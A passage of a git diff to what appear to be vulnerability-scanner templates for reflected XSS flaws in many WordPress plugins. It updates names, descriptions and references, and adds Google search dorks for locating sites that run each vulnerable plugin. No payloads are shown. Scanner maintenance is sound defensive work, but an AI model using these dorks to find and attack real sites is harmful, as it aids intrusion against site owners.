+    - https://nvd.nist.gov/vuln/detail/CVE-2016-1000128
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2016-1000128
     cwe-id: CWE-79
+  metadata:
+    google-query: inurl:"/wp-content/plugins/anti-plagiarism"
   tags: cve,cve2016,wordpress,xss,wp-plugin
 
 requests:
@@ -35,3 +38,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/05
diff --git a/cves/2016/CVE-2016-1000129.yaml b/cves/2016/CVE-2016-1000129.yaml
index 1f98da8d89..c15be50002 100644
--- a/cves/2016/CVE-2016-1000129.yaml
+++ b/cves/2016/CVE-2016-1000129.yaml
@@ -1,17 +1,22 @@
 id: CVE-2016-1000129
 
 info:
-  name: defa-online-image-protector <= 3.3 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress defa-online-image-protector <=3.3 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3
+  description: WordPress defa-online-image-protector 3.3 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   reference:
+    - https://wordpress.org/plugins/defa-online-image-protector
+    - http://www.vapidlabs.com/wp/wp_advisory.php?v=449
+    - http://web.archive.org/web/20210614204644/https://www.securityfocus.com/bid/93892
     - https://nvd.nist.gov/vuln/detail/CVE-2016-1000129
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2016-1000129
     cwe-id: CWE-79
+  metadata:
+    google-query: inurl:"/wp-content/plugins/defa-online-image-protector"
   tags: cve,cve2016,wordpress,xss,wp-plugin
 
 requests:
@@ -34,3 +39,6 @@ requests:
       - type: status
         status:
           - 200
+
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000130.yaml b/cves/2016/CVE-2016-1000130.yaml
index aa5fff9bcc..7916bb3e7f 100644
--- a/cves/2016/CVE-2016-1000130.yaml
+++ b/cves/2016/CVE-2016-1000130.yaml
@@ -1,17 +1,21 @@
 id: CVE-2016-1000130
 
 info:
-  name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via date_select.php
+  name: WordPress e-search <=1.0 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: Reflected XSS in wordpress plugin e-search v1.0
+  description: Wordpress plugin e-search 1.0 and before contains a cross-site scripting vulnerability via date_select.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   reference:
+    - https://wordpress.org/plugins/e-search
+    - http://www.vapidlabs.com/wp/wp_advisory.php?v=394
     - https://nvd.nist.gov/vuln/detail/CVE-2016-1000130
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2016-1000130
     cwe-id: CWE-79
+  metadata:
+    google-query: inurl:"/wp-content/plugins/e-search"
   tags: cve,cve2016,wordpress,xss,wp-plugin
 
 requests:
@@ -34,3 +38,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000131.yaml b/cves/2016/CVE-2016-1000131.yaml
index 1da1ce35db..6e0ec4ec01 100644
--- a/cves/2016/CVE-2016-1000131.yaml
+++ b/cves/2016/CVE-2016-1000131.yaml
@@ -1,17 +1,22 @@
 id: CVE-2016-1000131
 
 info:
-  name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via title_az.php
+  name: WordPress e-search <=1.0 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: Reflected XSS in wordpress plugin e-search v1.0
+  description: WordPress e-search 1.0 and before contains a reflected cross-site scripting vulnerability via title_az.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   reference:
+    - http://www.vapidlabs.com/wp/wp_advisory.php?v=393
+    - https://wordpress.org/plugins/e-search
+    - http://web.archive.org/web/20210123183536/https://www.securityfocus.com/bid/93867/
     - https://nvd.nist.gov/vuln/detail/CVE-2016-1000131
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2016-1000131
     cwe-id: CWE-79
+  metadata:
+    google-query: inurl:"/wp-content/plugins/e-search"
   tags: cve,cve2016,wordpress,xss,wp-plugin
 
 requests:
@@ -34,3 +39,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000132.yaml b/cves/2016/CVE-2016-1000132.yaml
index d61d51cd09..c45f6ec99c 100644
--- a/cves/2016/CVE-2016-1000132.yaml
+++ b/cves/2016/CVE-2016-1000132.yaml
@@ -1,17 +1,22 @@
 id: CVE-2016-1000132
 
 info:
-  name: enhanced-tooltipglossary v3.2.8 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress enhanced-tooltipglossary 3.2.8 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8
+  description: WordPress enhanced-tooltipglossary 3.2.8 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   reference:
+    - http://www.vapidlabs.com/wp/wp_advisory.php?v=37
+    - https://wordpress.org/plugins/enhanced-tooltipglossary
+    - http://web.archive.org/web/20210123183532/https://www.securityfocus.com/bid/93865/
     - https://nvd.nist.gov/vuln/detail/CVE-2016-1000132
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2016-1000132
     cwe-id: CWE-79
+  metadata:
+    google-query: inurl:"/wp-content/plugins/enhanced-tooltipglossary"
   tags: cve,cve2016,wordpress,xss,wp-plugin
 
 requests:
@@ -34,3 +39,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000133.yaml b/cves/2016/CVE-2016-1000133.yaml
index 7533de545b..3042b76c0f 100644
--- a/cves/2016/CVE-2016-1000133.yaml
+++ b/cves/2016/CVE-2016-1000133.yaml
@@ -1,17 +1,22 @@
 id: CVE-2016-1000133
 
 info:
-  name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress forget-about-shortcode-buttons 1.1.1 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1
+  description: Wordpress plugin forget-about-shortcode-buttons 1.1.1 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   reference:
+    - https://wordpress.org/plugins/forget-about-shortcode-buttons
+    - http://www.vapidlabs.com/wp/wp_advisory.php?v=602
+    - http://web.archive.org/web/20210123183542/https://www.securityfocus.com/bid/93869/
     - https://nvd.nist.gov/vuln/detail/CVE-2016-1000133
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2016-1000133
     cwe-id: CWE-79
+  metadata:
+    google-query: inurl:"/wp-content/plugins/forget-about-shortcode-buttons"
   tags: cve,cve2016,wordpress,xss,wp-plugin
 
 requests:
@@ -34,3 +39,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000134.yaml b/cves/2016/CVE-2016-1000134.yaml
index 49156b4ad3..f6a6513448 100644
--- a/cves/2016/CVE-2016-1000134.yaml
+++ b/cves/2016/CVE-2016-1000134.yaml
@@ -1,17 +1,22 @@
 id: CVE-2016-1000134
 
 info:
-  name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via playlist.php
+  name: WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: Reflected XSS in wordpress plugin hdw-tube v1.2
+  description: WordPress HDW Video Gallery 1.2 and before contains a cross-site scripting vulnerability via playlist.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   reference:
+    - http://www.vapidlabs.com/wp/wp_advisory.php?v=530
+    - https://wordpress.org/plugins/hdw-tube
+    - http://web.archive.org/web/20210615135341/https://www.securityfocus.com/bid/93868
     - https://nvd.nist.gov/vuln/detail/CVE-2016-1000134
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2016-1000134
     cwe-id: CWE-79
+  metadata:
+    google-query: inurl:"/wp-content/plugins/hdw-tube"
   tags: cve,cve2016,wordpress,xss,wp-plugin
 
 requests:
@@ -34,3 +39,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000135.yaml b/cves/2016/CVE-2016-1000135.yaml
index b14bff7762..b7341b1983 100644
--- a/cves/2016/CVE-2016-1000135.yaml
+++ b/cves/2016/CVE-2016-1000135.yaml
@@ -1,17 +1,22 @@
 id: CVE-2016-1000135
 
 info:
-  name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via mychannel.php
+  name: WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: Reflected XSS in wordpress plugin hdw-tube v1.2
+  description: WordPress HDW Video Gallery 1.2 and before contains a cross-site scripting vulnerability via mychannel.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   reference:
+    - http://www.vapidlabs.com/wp/wp_advisory.php?v=533
+    - https://wordpress.org/plugins/hdw-tube
+    - http://web.archive.org/web/20210123183240/https://www.securityfocus.com/bid/93820/
     - https://nvd.nist.gov/vuln/detail/CVE-2016-1000135
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2016-1000135
     cwe-id: CWE-79
+  metadata:
+    google-query: inurl:"/wp-content/plugins/hdw-tube"
   tags: cve,cve2016,wordpress,xss,wp-plugin
 
 requests:
@@ -34,3 +39,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000136.yaml b/cves/2016/CVE-2016-1000136.yaml
index 51da631926..2606d8cb00 100644
--- a/cves/2016/CVE-2016-1000136.yaml
+++ b/cves/2016/CVE-2016-1000136.yaml
@@ -1,18 +1,21 @@
 id: CVE-2016-1000136
 
 info:
-  name: heat-trackr v1.0 - XSS via heat-trackr_abtest_add.php
+  name: WordPress heat-trackr 1.0 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: Reflected XSS in wordpress plugin heat-trackr v1.0
+  description: WordPress heat-trackr 1.0 contains a cross-site scripting vulnerability via heat-trackr_abtest_add.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   reference:
     - http://www.vapidlabs.com/wp/wp_advisory.php?v=798
+    - https://wordpress.org/plugins/heat-trackr
     - https://nvd.nist.gov/vuln/detail/CVE-2016-1000136
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2016-1000136
     cwe-id: CWE-79
+  metadata:
+    google-query: inurl:"/wp-content/plugins/heat-trackr"
   tags: cve,cve2016,wordpress,xss,wp-plugin
 
 requests:
@@ -35,3 +38,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000137.yaml b/cves/2016/CVE-2016-1000137.yaml
index 4e3f689a0a..cd7de43aba 100644
--- a/cves/2016/CVE-2016-1000137.yaml
+++ b/cves/2016/CVE-2016-1000137.yaml
@@ -1,12 +1,15 @@
 id: CVE-2016-1000137
 
 info:
-  name: Hero Maps Pro 2.1.0 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress Hero Maps Pro 2.1.0 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: Reflected XSS in wordpress plugin hero-maps-pro v2.1.0
+  description: WordPress Hero Maps Pro 2.1.0 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   reference:
     - http://www.vapidlabs.com/wp/wp_advisory.php?v=658
+    - https://wordpress.org/plugins/hero-maps-pro
+    - http://web.archive.org/web/20210123183224/https://www.securityfocus.com/bid/93815/
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-1000137
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -34,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000138.yaml b/cves/2016/CVE-2016-1000138.yaml
index 5b988c640b..3d1b416c23 100644
--- a/cves/2016/CVE-2016-1000138.yaml
+++ b/cves/2016/CVE-2016-1000138.yaml
@@ -1,17 +1,22 @@
 id: CVE-2016-1000138
 
 info:
-  name: Admin Font Editor <= 1.8 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress Admin Font Editor <=1.8 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: Reflected XSS in wordpress plugin indexisto v1.0.5
+  description: WordPress Admin Font Editor plugin indexisto 1.8 and before contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   reference:
     - http://www.vapidlabs.com/wp/wp_advisory.php?v=38
+    - https://wordpress.org/plugins/indexisto
+    - http://web.archive.org/web/20210622181116/
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-1000138
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2016-1000138
     cwe-id: CWE-79
+  metadata:
+    google-query: inurl:"/wp-content/plugins/indexisto"
   tags: cve,cve2016,wordpress,xss,wp-plugin
 
 requests:
@@ -34,3 +39,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000139.yaml b/cves/2016/CVE-2016-1000139.yaml
index dd26243a2c..f12cd70647 100644
--- a/cves/2016/CVE-2016-1000139.yaml
+++ b/cves/2016/CVE-2016-1000139.yaml
@@ -1,19 +1,23 @@
 id: CVE-2016-1000139
 
 info:
-  name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - XSS
+  name: WordPress Infusionsoft Gravity Forms <=1.5.11 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: Reflected XSS in wordpress plugin infusionsoft v1.5.11
+  description: WordPress plugin Infusionsoft 1.5.11 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   reference:
     - https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a
+    - https://wordpress.org/plugins/infusionsoft
+    - http://www.vapidlabs.com/wp/wp_advisory.php?v=864
     - https://nvd.nist.gov/vuln/detail/CVE-2016-1000139
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2016-1000139
     cwe-id: CWE-79
-  tags: cve,cve2016,wordpress,wp-plugin,xss
+  metadata:
+    google-query: inurl:"/wp-content/plugins/infusionsoft"
+  tags: cve,cve2016,wordpress,wp-plugin,xss,wpscan
 
 requests:
   - method: GET
@@ -37,3 +41,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000140.yaml b/cves/2016/CVE-2016-1000140.yaml
index a9fad16d82..4c24bebc9d 100644
--- a/cves/2016/CVE-2016-1000140.yaml
+++ b/cves/2016/CVE-2016-1000140.yaml
@@ -1,11 +1,14 @@
 id: CVE-2016-1000140
 
 info:
-  name: New Year Firework <= 1.1.9 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress New Year Firework <=1.1.9 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: Reflected XSS in wordpress plugin new-year-firework v1.1.9
+  description: WordPress New Year Firework 1.1.9 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   reference:
+    - http://www.vapidlabs.com/wp/wp_advisory.php?v=453
+    - https://wordpress.org/plugins/new-year-firework
+    - http://web.archive.org/web/20210123183230/https://www.securityfocus.com/bid/93817/
     - https://nvd.nist.gov/vuln/detail/CVE-2016-1000140
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -34,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000141.yaml b/cves/2016/CVE-2016-1000141.yaml
index 5a145c55c7..27b9bd4027 100644
--- a/cves/2016/CVE-2016-1000141.yaml
+++ b/cves/2016/CVE-2016-1000141.yaml
@@ -1,19 +1,22 @@
 id: CVE-2016-1000141
 
 info:
-  name: WordPress Page Layout builder v1.9.3 - Reflected Cross-Site Scripting
+  name: WordPress Page Layout builder v1.9.3 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: WordPress plugin Page-layout-builder v1.9.3 contains a cross-site scripting vulnerability.
   reference:
     - http://www.vapidlabs.com/wp/wp_advisory.php?v=358
     - https://nvd.nist.gov/vuln/detail/CVE-2016-1000141
+    - https://wordpress.org/plugins/page-layout-builder
+  remediation: Upgrade to version 2.0 or higher.
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2016-1000141
     cwe-id: CWE-79
-  remediation: Upgrade to version 2.0 or higher.
+  metadata:
+    google-query: inurl:"/wp-content/plugins/page-layout-builder"
   tags: cve,cve2016,wordpress,xss,wp-plugin
 
 requests:
diff --git a/cves/2016/CVE-2016-1000142.yaml b/cves/2016/CVE-2016-1000142.yaml
index c1aa662652..b0c809b337 100644
--- a/cves/2016/CVE-2016-1000142.yaml
+++ b/cves/2016/CVE-2016-1000142.yaml
@@ -1,19 +1,21 @@
 id: CVE-2016-1000142
 
 info:
-  name: MW Font Changer <= 4.2.5 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+  name: WordPress MW Font Changer <=4.2.5 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: The MW Font Changer WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
+  description: WordPress MW Font Changer plugin 4.2.5 and before contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   reference:
     - https://wpscan.com/vulnerability/4ff5d65a-ba61-439d-ab7f-745a0648fccc
+    - http://www.vapidlabs.com/wp/wp_advisory.php?v=435
+    - https://wordpress.org/plugins/parsi-font
     - https://nvd.nist.gov/vuln/detail/CVE-2016-1000142
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2016-1000142
     cwe-id: CWE-79
-  tags: cve,cve2016,wordpress,wp-plugin,xss
+  tags: cve2016,wordpress,wp-plugin,xss,wpscan,cve
 
 requests:
   - method: GET
@@ -35,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000143.yaml b/cves/2016/CVE-2016-1000143.yaml
index d67e4f9833..090c6d4c73 100644
--- a/cves/2016/CVE-2016-1000143.yaml
+++ b/cves/2016/CVE-2016-1000143.yaml
@@ -1,12 +1,13 @@
 id: CVE-2016-1000143
 
 info:
-  name: Photoxhibit v2.1.8 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+  name: WordPress Photoxhibit 2.1.8 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: Reflected XSS in wordpress plugin photoxhibit v2.1.8
+  description: WordPress Photoxhibit 2.1.8 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   reference:
     - http://www.vapidlabs.com/wp/wp_advisory.php?v=780
+    - https://wordpress.org/plugins/photoxhibit
     - https://nvd.nist.gov/vuln/detail/CVE-2016-1000143
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -35,3 +36,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000146.yaml b/cves/2016/CVE-2016-1000146.yaml
index ba02431c6f..3775d4f585 100644
--- a/cves/2016/CVE-2016-1000146.yaml
+++ b/cves/2016/CVE-2016-1000146.yaml
@@ -1,11 +1,14 @@
 id: CVE-2016-1000146
 
 info:
-  name: Pondol Form to Mail <= 1.1 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress Pondol Form to Mail <=1.1 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: Reflected XSS in wordpress plugin pondol-formmail v1.1
+  description: WordPress Pondol Form to Mail 1.1 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   reference:
+    - http://www.vapidlabs.com/wp/wp_advisory.php?v=787
+    - https://wordpress.org/plugins/pondol-formmail
+    - http://web.archive.org/web/20210615122859/https://www.securityfocus.com/bid/93584
     - https://nvd.nist.gov/vuln/detail/CVE-2016-1000146
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -34,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000148.yaml b/cves/2016/CVE-2016-1000148.yaml
index d084222ec3..fe1ef6ac43 100644
--- a/cves/2016/CVE-2016-1000148.yaml
+++ b/cves/2016/CVE-2016-1000148.yaml
@@ -1,19 +1,21 @@
 id: CVE-2016-1000148
 
 info:
-  name: S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+  name: WordPress S3 Video <=0.983 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: Reflected XSS in wordpress plugin s3-video v0.983
+  description: WordPress S3 Video and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   reference:
     - https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54
+    - https://wordpress.org/plugins/s3-video
+    - http://www.vapidlabs.com/wp/wp_advisory.php?v=240
     - https://nvd.nist.gov/vuln/detail/CVE-2016-1000148
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2016-1000148
     cwe-id: CWE-79
-  tags: cve,cve2016,wordpress,wp-plugin,xss
+  tags: cve,cve2016,wordpress,wp-plugin,xss,wpscan
 
 requests:
   - method: GET
@@ -35,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000149.yaml b/cves/2016/CVE-2016-1000149.yaml
index b6f8c9e451..9609e2b630 100644
--- a/cves/2016/CVE-2016-1000149.yaml
+++ b/cves/2016/CVE-2016-1000149.yaml
@@ -1,11 +1,14 @@
 id: CVE-2016-1000149
 
 info:
-  name: Simpel Reserveren 3 <= 3.5.2 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress Simpel Reserveren <=3.5.2 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: Reflected XSS in wordpress plugin simpel-reserveren v3.5.2
+  description: WordPress plugin Simpel Reserveren 3.5.2 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   reference:
+    - https://wordpress.org/plugins/simpel-reserveren
+    - http://www.vapidlabs.com/wp/wp_advisory.php?v=474
+    - http://web.archive.org/web/20210125181834/https://www.securityfocus.com/bid/93582/
     - https://nvd.nist.gov/vuln/detail/CVE-2016-1000149
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -34,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000152.yaml b/cves/2016/CVE-2016-1000152.yaml
index 81564defed..3b6e131fe0 100644
--- a/cves/2016/CVE-2016-1000152.yaml
+++ b/cves/2016/CVE-2016-1000152.yaml
@@ -1,11 +1,14 @@
 id: CVE-2016-1000152
 
 info:
-  name: Tidio-form <= 1.0 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress Tidio-form <=1.0 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: Reflected XSS in wordpress plugin tidio-form v1.0
+  description: WordPress tidio-form1.0 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   reference:
+    - http://www.vapidlabs.com/wp/wp_advisory.php?v=799
+    - https://wordpress.org/plugins/tidio-form
+    - http://web.archive.org/web/20210125181732/https://www.securityfocus.com/bid/93579/
     - https://nvd.nist.gov/vuln/detail/CVE-2016-1000152
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -34,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000153.yaml b/cves/2016/CVE-2016-1000153.yaml
index dd76ca2ab8..bca2722d4f 100644
--- a/cves/2016/CVE-2016-1000153.yaml
+++ b/cves/2016/CVE-2016-1000153.yaml
@@ -1,12 +1,15 @@
 id: CVE-2016-1000153
 
 info:
-  name: Tidio Gallery <= 1.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+  name: WordPress Tidio Gallery <=1.1 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: Reflected XSS in wordpress plugin tidio-gallery v1.1
+  description: WordPress plugin tidio-gallery v1.1 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2016-1000153
+    - http://www.vapidlabs.com/wp/wp_advisory.php?v=427
+    - https://wordpress.org/plugins/tidio-gallery
+    - http://web.archive.org/web/20210123180207/https://www.securityfocus.com/bid/93543/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -34,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000154.yaml b/cves/2016/CVE-2016-1000154.yaml
index f1807d5b58..95e8c20fee 100644
--- a/cves/2016/CVE-2016-1000154.yaml
+++ b/cves/2016/CVE-2016-1000154.yaml
@@ -1,11 +1,14 @@
 id: CVE-2016-1000154
 
 info:
-  name: WHIZZ <= 1.0.7 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress WHIZZ <=1.0.7 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: Reflected XSS in wordpress plugin whizz v1.0.
+  description: WordPress plugin WHIZZ 1.07 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   reference:
+    - http://www.vapidlabs.com/wp/wp_advisory.php?v=112
+    - https://wordpress.org/plugins/whizz
+    - http://web.archive.org/web/20210123180140/https://www.securityfocus.com/bid/93538/
     - https://nvd.nist.gov/vuln/detail/CVE-2016-1000154
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -34,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
